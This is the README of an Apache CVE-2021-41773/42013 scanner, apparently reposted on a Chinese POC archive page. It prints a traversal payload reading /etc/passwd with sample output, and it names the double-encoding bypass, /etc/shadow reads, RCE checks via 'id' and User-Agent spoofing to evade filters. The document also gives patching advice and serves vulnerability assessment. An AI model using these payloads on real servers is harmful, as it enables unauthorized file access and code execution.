关联漏洞
标题:Apache HTTP Server 安全漏洞 (CVE-2021-42013)Description:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
Description
A comprehensive Python-based vulnerability scanner for detecting CVE-2021-41773 and CVE-2021-42013 path traversal and remote code execution vulnerabilities in Apache HTTP Server versions 2.4.49 and 2.4.50.
介绍
# CVE-2021-41773 / CVE-2021-42013 Apache Vulnerability Scanner
A comprehensive Python-based vulnerability scanner for detecting **CVE-2021-41773** and **CVE-2021-42013** path traversal and remote code execution vulnerabilities in Apache HTTP Server versions 2.4.49 and 2.4.50.
## Overview
CVE-2021-41773 and CVE-2021-42013 are critical vulnerabilities affecting Apache HTTP Server that allow attackers to:
- **Read arbitrary files** from the server (path traversal)
- **Execute arbitrary code** on the server (remote code execution)
- **Bypass security restrictions** through improper URL normalization
These vulnerabilities gained widespread attention in October 2021 and have been actively exploited in the wild.
## Vulnerabilities Explained
### CVE-2021-41773 (Apache 2.4.49)
- **Type**: Path Traversal + Remote Code Execution
- **CVSS Score**: 9.8 Critical
- **Affected Versions**: Apache HTTP Server 2.4.49
- **Root Cause**: Improper path normalization allowing encoded dot characters (`.%2e`) to bypass directory restrictions
- **Impact**: Read sensitive files like `/etc/passwd`, execute arbitrary commands if mod_cgi is enabled
### CVE-2021-42013 (Apache 2.4.50)
- **Type**: Path Traversal + Remote Code Execution
- **CVSS Score**: 9.8 Critical
- **Affected Versions**: Apache HTTP Server 2.4.50
- **Root Cause**: Insufficient fix for CVE-2021-41773, allows double URL encoding (`%%32%65`) bypass
- **Impact**: Same as CVE-2021-41773, affects the patched version
## Features
✅ **Dual CVE Detection**: Tests for both CVE-2021-41773 and CVE-2021-42013
✅ **Path Traversal Testing**: Multiple payload variations for file access attempts
✅ **RCE Testing**: Remote code execution verification if mod_cgi is enabled
✅ **Batch Scanning**: Scan multiple targets from a file
✅ **Color-Coded Output**: Easy-to-read formatted results
✅ **Customizable Timeout**: Adjustable request timeout for unreliable networks
✅ **User-Agent Spoofing**: Bypasses basic filtering mechanisms
## Requirements
- Python 3.6+
- `requests` library
- `colorama` library
## Installation
### Clone the Repository
```bash
https://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
```
### Install Dependencies
```bash
pip3 install -r requirements.txt
```
Or manually install:
```bash
pip3 install requests colorama
```
## Usage
### Single Target Scan
```bash
python3 cve_scanner.py -u http://192.168.1.100
```
### HTTPS Target
```bash
python3 cve_scanner.py -u https://target.com
```
### Custom Timeout
```bash
python3 cve_scanner.py -u http://target.com -t 15
```
### Batch Scanning
```bash
python3 cve_scanner.py -l targets.txt
```
### Help
```bash
python3 cve_scanner.py -h
```
## Command-Line Arguments
| Argument | Short | Type | Description |
|----------|-------|------|-------------|
| `--url` | `-u` | STRING | Target URL (e.g., http://example.com) |
| `--list` | `-l` | FILE | File containing list of targets (one per line) |
| `--timeout` | `-t` | INTEGER | Request timeout in seconds (default: 10) |
## Example Usage
### Single Target
```bash
python3 cve_scanner.py -u http://192.168.1.100
```
### Multiple Targets
Create `targets.txt`:
```
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
```
Then run:
```bash
python3 cve_scanner.py -l targets.txt -t 15
```
### Extended Timeout for Slow Networks
```bash
python3 cve_scanner.py -u http://target.com -t 30
```
## Output
The scanner provides detailed output including:
- **Vulnerability Detection Status**: Whether each CVE is detected
- **Payload Information**: Which payload triggered the vulnerability
- **Response Data**: Sample of the server response
- **Recommendations**: Patching guidance
Example output:
```
============================================================
CVE-2021-41773 / CVE-2021-42013 Vulnerability Scanner
============================================================
[*] Target: http://192.168.1.100
[*] Testing CVE-2021-41773 (Apache 2.4.49)...
[+] VULNERABLE to CVE-2021-41773!
[+] Payload: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] Response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
Scan Summary
============================================================
[!] Target is VULNERABLE!
[!] Immediate patching required!
[*] Recommendation: Upgrade to Apache HTTP Server 2.4.51 or later
============================================================
```
## How It Works
### CVE-2021-41773 Detection
1. Sends requests with single URL-encoded payloads (`.%2e`)
2. Targets alias directories: `/cgi-bin/`, `/icons/`, `/images/`
3. Attempts to read `/etc/passwd` and `/etc/shadow`
4. Tests command execution via POST requests
### CVE-2021-42013 Detection
1. Sends requests with double URL-encoded payloads (`%%32%65`)
2. Uses same target directories as CVE-2021-41773
3. Bypasses the insufficient patch in Apache 2.4.50
4. Verifies RCE capability if mod_cgi is enabled
### RCE Testing
- Executes `id` command to verify code execution
- Works only if mod_cgi module is enabled
- Looks for `uid=` and `gid=` in response
## Detection Indicators
The scanner looks for:
- **Successful path traversal**: Response contains `root:` or `daemon:` entries from `/etc/passwd`
- **Successful RCE**: Response contains `uid=` and `gid=` from `id` command execution
- **HTTP Status Code**: 200 OK with expected content
## Mitigation
### Immediate Actions
1. **Upgrade Apache HTTP Server** to version 2.4.51 or later
2. **Disable mod_cgi** if not required
3. **Apply strict directory restrictions**:
```apache
<Directory />
Require all denied
</Directory>
```
### Configuration Hardening
```apache
# Restrict access to sensitive directories
<Directory /cgi-bin>
Require all denied
</Directory>
# Disable symbolic links if not needed
Options -FollowSymLinks
# Enable security headers
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
```
### Version Check
```bash
# Check Apache version
apache2 -v
httpd -v
```
## Supported Apache Versions
| Version | Status | Action |
|---------|--------|--------|
| 2.4.49 | ❌ Vulnerable | Upgrade immediately |
| 2.4.50 | ⚠️ Partially Patched | Upgrade to 2.4.51+ |
| 2.4.51+ | ✅ Patched | No action needed |
## Disclaimer
⚠️ **IMPORTANT**: This tool is intended **ONLY** for authorized security testing and educational purposes. Unauthorized access to computer systems is **ILLEGAL** under laws like the Computer Fraud and Abuse Act (CFAA) and similar legislation worldwide.
**Authorized Use Only:**
- Penetration testing with written permission
- Security audits of your own infrastructure
- CTF competitions and training platforms (TryHackMe, HackTheBox, etc.)
- Educational and research purposes
**Misuse Warning**: Users are responsible for ensuring they have explicit authorization before testing any target. The authors assume no liability for unauthorized use.
## Use Cases
This scanner is ideal for:
### Security Professionals
- Vulnerability assessment and management
- Penetration testing engagements
- Security audits of Apache infrastructure
- Compliance verification (PCI-DSS, etc.)
### System Administrators
- Identifying vulnerable Apache instances
- Validating patch deployment
- Infrastructure security audits
- Server inventory scanning
### Cybersecurity Students
- Learning vulnerability exploitation
- Understanding path traversal attacks
- CTF challenge solving
- Security research and education
### DevOps/DevSecOps
- Infrastructure vulnerability scanning
- CI/CD pipeline security checks
- Container scanning (if running Apache)
- Pre-deployment security verification
## Files
```
.
├── cve_scanner.py # Main scanner script
├── requirements.txt # Python dependencies
├── README.md # This file
├── targets.txt # Example target list
└── LICENSE # License information
```
## Configuration Files
### requirements.txt
```
requests==2.28.1
colorama==0.4.5
```
### targets.txt (Example)
```
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
```
## Troubleshooting
### Issue: Connection Timeout
**Solution**: Increase timeout with `-t` option
```bash
python3 cve_scanner.py -u http://target.com -t 30
```
### Issue: SSL Certificate Error
**Solution**: The script disables SSL verification by default. If issues persist, ensure Python certificates are updated:
```bash
pip3 install --upgrade certifi
```
### Issue: Module Not Found
**Solution**: Ensure all dependencies are installed
```bash
pip3 install -r requirements.txt
```
### Issue: Permission Denied
**Solution**: Make the script executable
```bash
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
```
## Performance Tips
- **Batch Scanning**: Use `-l` with a target file for multiple scans
- **Parallel Scanning**: For large-scale scanning, run multiple instances with task splitting
- **Timeout Optimization**: Lower timeout values for fast networks, higher for slow connections
- **Target Validation**: Verify targets are reachable before batch scanning
## References
- [NVD CVE-2021-41773](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
- [NVD CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
- [Apache HTTP Server Security Advisory](https://httpd.apache.org/security/)
- [Qualys Security Research](https://blog.qualys.com/vulnerabilities-threat-research/)
- [CISA Alert AA21-265A](https://us-cert.cisa.gov/ncas/alerts/2021/09/22/cisa-releases-alert-based-vulnerability-affecting-apache-httpd)
## Contributing
Contributions are welcome! To contribute:
1. **Fork** the repository
2. **Create** a feature branch (`git checkout -b feature/improvement`)
3. **Commit** your changes (`git commit -m 'Add improvement'`)
4. **Push** to the branch (`git push origin feature/improvement`)
5. **Submit** a Pull Request
Please ensure:
- Code follows PEP 8 standards
- Comments explain complex logic
- Payloads are tested for effectiveness
- README is updated if adding features
## License
This project is licensed under the MIT License. See the LICENSE file for details.
## Author
**Security Testing Tool**
Created for educational and authorized security testing purposes.
For questions, issues, or suggestions, please open an issue on GitHub.
## Changelog
### Version 1.0.0 (Initial Release)
- ✅ CVE-2021-41773 detection
- ✅ CVE-2021-42013 detection
- ✅ Path traversal testing
- ✅ RCE capability verification
- ✅ Batch scanning support
- ✅ Color-coded output
- ✅ Customizable timeout
## Security Notes
- The scanner sends HTTP requests to target servers
- It does not modify any files on target systems
- SSL verification is disabled for flexibility
- User-Agent is spoofed to bypass basic filtering
- Results should be validated before taking action
- Always maintain logs of authorized testing
---
**Last Updated**: November 2025
**Status**: Active Development
**Tested On**: Python 3.8+, Apache 2.4.49, 2.4.50
文件快照
[4.0K] /data/pocs/a968b7130cd7bd5204ce05b7f5ad94369332d637
├── [9.7K] CVE-2021-41773.py
└── [ 11K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →